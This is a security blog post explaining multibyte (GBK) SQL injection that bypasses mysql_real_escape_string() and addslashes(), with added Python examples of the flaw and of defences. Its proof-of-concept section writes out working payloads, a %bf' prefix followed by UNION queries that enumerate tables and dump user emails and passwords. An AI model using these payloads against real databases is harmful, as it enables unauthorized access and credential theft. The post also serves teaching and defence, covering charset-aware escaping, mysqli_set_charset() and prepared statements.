MultiByte SQL Injection – Bypasses MySql Real Escape String And AddSlashes Protection

mysql_real_escape_string() & addslashes():

In simple words, it is a MySQL client library function that escapes the special characters in a string. A sample call looks like this:

mysqli_real_escape_string($connstring, $id);

The function adds an escape character, the backslash \, before certain potentially dangerous characters in the string passed to it. The characters escaped are \x00, \n, \r, \, ', " and \x1a.

When a malicious user sends a payload like

select * from users where id="(payload here)";   ->   payload: " or "1"="1--

mysql_real_escape_string() escapes it as follows:

select * from users where id="(payload here)";   ->   payload after escaping: \" or \"1\"=\"1--

The addslashes() function works the same way.

MySQL Charsets:

MySQL supports several character sets by default. You can list them from the mysql console as follows (only the multibyte East Asian sets are shown here).

mysql> SHOW CHARACTER SET;
+--------------------+---------------------------------+
| CHARACTER_SET_NAME | DESCRIPTION                     |
+--------------------+---------------------------------+
| big5               | Big5 Traditional Chinese        |
| cp932              | SJIS for Windows Japanese       |
| eucjpms            | UJIS for Windows Japanese       |
| euckr              | EUC-KR Korean                   |
| gb18030            | China National Standard GB18030 |
| gb2312             | GB2312 Simplified Chinese       |
| gbk                | GBK Simplified Chinese          |
| sjis               | Shift-JIS Japanese              |
| ujis               | EUC-JP Japanese                 |
+--------------------+---------------------------------+

MultiByte Injection:

As we have seen, mysql_real_escape_string() adds a backslash (%5c) before our quote (%27). The trick is that when %bf or %af is placed in front of the quote (%27), the escaped bytes are interpreted as follows:

%bf' -> %bf%5c'    here %bf%5c becomes the Chinese ¿ character, a valid two-byte character in the gbk character set, so the backslash is swallowed and the quote is no longer escaped

%af' -> %af%5c'    here %af%5c becomes the Chinese ┐ character, likewise a valid two-byte character in the gbk character set

In this way the string literal is broken out of and SQL injection becomes possible again, even though every quote was "escaped".
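The following is an added example, not code from the original post. It models the two sides of the problem described above: a byte-oriented escaper in the style of addslashes() / the old mysql_real_escape_string() (which cannot know that 0xBF is a GBK lead byte), and the server-side decode that turns the inserted 0x5C into that character's trail byte. It also shows the defensive check a practitioner would add: reject input that is not well-formed in the connection charset, and escape per character rather than per byte. All payloads are constructed here and nothing connects to a database; the function names are the example's own.

```python
# Added example (not from the original post): byte-level escaping versus what a
# GBK-configured server sees. All inputs are constructed; no database involved.

# Bytes that a byte-oriented escaper prefixes with a backslash (0x5c). This is
# simplified: mysql_real_escape_string() rewrites \x00 as \0 and \x1a as \Z,
# which does not change the quote case demonstrated here.
ESCAPED_BYTES = {0x00, 0x0A, 0x0D, 0x5C, 0x27, 0x22, 0x1A}

# The same set as characters, for the charset-aware variant below.
ESCAPED_CHARS = {"\x00", "\n", "\r", "\\", "'", '"', "\x1a"}


def naive_escape(payload: bytes) -> bytes:
    """Escape byte by byte with no knowledge of the connection charset.

    This is the failure mode the post describes: the escaper cannot tell that
    0xBF is a GBK lead byte, so the 0x5C it inserts becomes a trail byte.
    """
    out = bytearray()
    for b in payload:
        if b in ESCAPED_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quote_present(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes as the server would under `charset` and report
    whether a single quote survives that is NOT preceded by a backslash
    character, i.e. one that would terminate the string literal."""
    text = escaped.decode(charset, errors="replace")
    return any(
        ch == "'" and (i == 0 or text[i - 1] != "\\")
        for i, ch in enumerate(text)
    )


def is_well_formed(payload: bytes, charset: str) -> bool:
    """Defensive check: does the raw input decode cleanly in the connection
    charset? A lone 0xBF directly before a quote is not valid GBK, so the
    bypass prefix fails this check while honest GBK text passes it."""
    try:
        payload.decode(charset)
    except UnicodeDecodeError:
        return False
    return True


def charset_aware_escape(payload: bytes, charset: str) -> bytes:
    """Escape per character rather than per byte: decode strictly, insert
    backslashes, re-encode. Malformed input raises instead of being mangled.
    (In PHP this is what the client library does once mysqli_set_charset()
    has told it the connection charset.)"""
    text = payload.decode(charset)  # UnicodeDecodeError on malformed input
    escaped = "".join("\\" + ch if ch in ESCAPED_CHARS else ch for ch in text)
    return escaped.encode(charset)


def demo(charset: str = "gbk") -> dict:
    """Run the post's %bf' prefix through the naive escaper under one charset."""
    payload = b"\xbf'"  # constructed: the %bf' prefix from the post
    naive = naive_escape(payload)
    return {
        "naive_escaped": naive,
        "quote_survives_naive": unescaped_quote_present(naive, charset),
        "input_well_formed": is_well_formed(payload, charset),
    }


if __name__ == "__main__":
    for cs in ("gbk", "latin1", "utf-8"):
        print(cs, demo(cs))
```

Under gbk the naive escaper's output still contains a live quote, while under latin1 or utf-8 the same bytes are harmless; the is_well_formed() check catches the malformed prefix before it reaches the escaper, and charset_aware_escape() handles genuine GBK text (including a quote inside it) correctly.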

Proof Of Concept:

To make this clear, I built a sample demo application with a simple search feature.

Here I am using %bf' to break the query.

I need the column count in order to build UNION queries, so I did a quick search like

%bf' order by 10--

We have the columns; next I need the table names. Our search query will be

%bf' union all select 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10 from mysql.innodb_table_stats where database_name=schema();--

Finally, dumping the credentials:

%bf' union all select 1,group_concat(email,0x0a,password),3,4,5,6,7,8,9,10 from users--

Mitigations:

  • Trust No One – Remember this and sanitize everything that comes from front-end users.
  • Prepared statements, stored procedures and parameterized queries defend properly against these attacks.
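As an added example (not code from the original post), here is the post's search feature built twice on an in-memory SQLite table: once with string concatenation, once as a parameterized query. SQLite stands in for MySQL because it ships with Python and has no GBK connection charset, so this shows only the second mitigation above, why a bound parameter is immune to quote-based breakouts whether the quote is smuggled past an escaper with a multibyte prefix or not. The table contents and function names are constructed for the example.

```python
# Added example (not from the original post): concatenated vs parameterized
# search on constructed sample data in an in-memory SQLite database.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a users table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            (1, "alice@example.test", "hash-a"),
            (2, "bob@example.test", "hash-b"),
            (3, "carol@example.test", "hash-c"),
        ],
    )
    return conn


def search_concat(conn: sqlite3.Connection, term: str) -> list:
    """Vulnerable: the term is pasted into the SQL text, so any quote that
    survives escaping (or was never escaped) changes the query structure."""
    sql = "SELECT email FROM users WHERE email = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn: sqlite3.Connection, term: str) -> list:
    """Hardened: the term travels as a bound value, never as SQL text, so the
    parser sees exactly one string literal no matter what bytes it contains.
    Character-set tricks against an escaper have nothing to work on here."""
    rows = conn.execute("SELECT email FROM users WHERE email = ?", (term,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    probe = "' or '1'='1"  # the post's tautology payload, constructed here
    print("concat :", search_concat(db, probe))  # every row leaks
    print("param  :", search_param(db, probe))   # no row matches that literal
```

On the escaping path itself, the charset matters: in PHP the client library escapes correctly for a multibyte charset only when it has been told about it through mysqli_set_charset(), not through a bare SET NAMES query, which changes the server's view but not the client's. Prepared statements remove the question entirely.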

References:

  • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • http://php.net/manual/en/security.database.sql-injection.php

MrR3boot

An Active Bug Hunter and Exploit Researcher. Reported several bugs to top tech giants like Microsoft, Google, Intel, Us.Dept of Defense etc. PHP Lover. Blogger. Other than hacking he loves Travelling, Exploring the world. Git-Ref: https://github.com/MrR3boot/
